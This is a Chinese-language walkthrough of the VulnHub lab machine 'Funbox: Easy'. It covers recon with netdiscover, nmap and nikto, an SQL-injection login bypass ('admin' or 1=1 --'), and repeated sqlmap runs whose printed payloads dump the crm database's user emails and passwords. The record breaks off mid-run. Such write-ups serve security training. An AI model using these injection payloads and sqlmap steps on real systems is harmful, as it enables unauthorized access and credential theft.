Funbox 3
作者:jason_huawen
靶机信息
名称:Funbox: Easy
地址:
https://www.vulnhub.com/entry/funbox-easy,526/
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:8e:cb:62 1 60 PCS Systemtechnik GmbH
192.168.56.162 08:00:27:a9:a9:9e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 21:30 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=1/9%Time=63BCCDE6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a
SF:\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000"
SF:)%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:A9:A9:9E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.82 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、33060(?)
获得Shell
先看一下mysql是否有弱口令:
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ mysql -uroot -p -h 192.168.56.162
Enter password:
ERROR 2002 (HY000): Can't connect to server on '192.168.56.162' (115)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym
当访问contact链接时,返回以下信息:
-
LAMP
-
Gym Management Software
但不知道具体版本
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ searchsploit gym
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
-------------------------------------------------------------------------------------------- ---------------------------------
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ nikto -h http://192.168.56.162
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.162
+ Target Hostname: 192.168.56.162
+ Target Port: 80
+ Start Time: 2023-01-09 21:40:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Multiple index files found: /index.html, /index.php
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5abac58e39aeb, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /store/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2023-01-09 21:41:05 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
nikto工具发现了/admin目录,可以用admin' or 1=1 -- 轻松登录。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/secret/
„Anyone who lives within their means suffers from a lack of imagination.“
Oscar Wilde (*1854 - †1900)
admin登录以后测试SQL注入漏洞(用Burpsuite拦截请求)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ ls
48506.py nmap_full_scan req.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:57:49 /2023-01-09/
[21:57:49] [INFO] parsing HTTP request from 'req.txt'
[21:57:51] [INFO] testing connection to the target URL
[21:57:51] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:57:51] [INFO] testing if the target URL content is stable
[21:57:51] [INFO] target URL content is stable
[21:57:51] [INFO] testing if GET parameter 'id' is dynamic
[21:57:51] [INFO] GET parameter 'id' appears to be dynamic
[21:57:52] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[21:57:52] [INFO] testing for SQL injection on GET parameter 'id'
[21:57:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:52] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="SEO")
[21:57:53] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] y
[21:58:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:58:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:58:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:58:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:58:03] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[21:58:03] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[21:58:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:58:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:58:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:58:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:58:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:58:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:58:03] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:58:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:58:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:58:03] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[21:58:03] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:58:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:58:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:58:03] [INFO] testing 'Generic inline queries'
[21:58:03] [INFO] testing 'MySQL inline queries'
[21:58:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[21:58:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[21:58:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[21:58:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[21:58:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[21:58:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[21:58:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:58:13] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[21:58:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:58:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:58:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:58:13] [INFO] target URL appears to have 27 columns in query
[21:58:13] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 79 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[21:58:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:58:24] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 21:58:24 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.6.7#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:58:32 /2023-01-09/
[21:58:32] [INFO] parsing HTTP request from 'req.txt'
[21:58:32] [INFO] resuming back-end DBMS 'mysql'
[21:58:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[21:58:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:58:33] [INFO] fetching database names
available databases [2]:
[*] crm
[*] information_schema
[21:58:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 21:58:33 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 -D crm --tables
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:58:44 /2023-01-09/
[21:58:44] [INFO] parsing HTTP request from 'req.txt'
[21:58:44] [INFO] resuming back-end DBMS 'mysql'
[21:58:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[21:58:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:58:44] [INFO] fetching tables for database: 'crm'
Database: crm
[5 tables]
+-----------+
| user |
| admin |
| prequest |
| ticket |
| usercheck |
+-----------+
[21:58:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 21:58:44 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 -D crm -T user --columns
___
__H__
___ ___[']_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:59:01 /2023-01-09/
[21:59:01] [INFO] parsing HTTP request from 'req.txt'
[21:59:01] [INFO] resuming back-end DBMS 'mysql'
[21:59:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[21:59:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:59:02] [INFO] fetching columns for table 'user' in database 'crm'
Database: crm
Table: user
[11 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| address | varchar(500) |
| alt_email | varchar(255) |
| email | varchar(255) |
| gender | varchar(255) |
| id | int |
| mobile | varchar(255) |
| name | varchar(255) |
| password | varchar(255) |
| posting_date | timestamp |
| status | int |
| user_image | varchar(255) |
+--------------+--------------+
[21:59:02] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 21:59:02 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 -D crm -T user -C email,password --dump
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:59:36 /2023-01-09/
[21:59:36] [INFO] parsing HTTP request from 'req.txt'
[21:59:36] [INFO] resuming back-end DBMS 'mysql'
[21:59:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[21:59:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:59:36] [INFO] fetching entries of column(s) 'email,password' for table 'user' in database 'crm'
Database: crm
Table: user
[5 entries]
+---------------------+------------+
| email | password |
+---------------------+------------+
| [email protected] | 123456 |
| [email protected] | 123456 |
| [email protected] | Test@12345 |
| [email protected] | Test@123 |
| [email protected] | Test@123 |
+---------------------+------------+
[21:59:37] [INFO] table 'crm.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.162/dump/crm/user.csv'
[21:59:37] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 21:59:37 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 -D crm -T admin --columns
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:00:41 /2023-01-09/
[22:00:42] [INFO] parsing HTTP request from 'req.txt'
[22:00:42] [INFO] resuming back-end DBMS 'mysql'
[22:00:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[22:00:42] [INFO] fetching columns for table 'admin' in database 'crm'
Database: crm
Table: admin
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int |
| name | varchar(255) |
| password | varchar(255) |
+----------+--------------+
[22:00:42] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 22:00:42 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 -D crm -T admin -C name,password
___
__H__
___ ___[)]_____ ___ ___ {1.6.7#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:00:53 /2023-01-09/
[22:00:53] [INFO] parsing HTTP request from 'req.txt'
[22:00:53] [INFO] resuming back-end DBMS 'mysql'
[22:00:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[22:00:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[22:00:53] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 22:00:53 /2023-01-09/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sqlmap -r req.txt --level=3 -D crm -T admin -C name,password --dump
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:00:59 /2023-01-09/
[22:00:59] [INFO] parsing HTTP request from 'req.txt'
[22:00:59] [INFO] resuming back-end DBMS 'mysql'
[22:00:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5036=5036-- JLji
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11' AND (SELECT 1335 FROM (SELECT(SLEEP(5)))MjlZ)-- cDaM
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
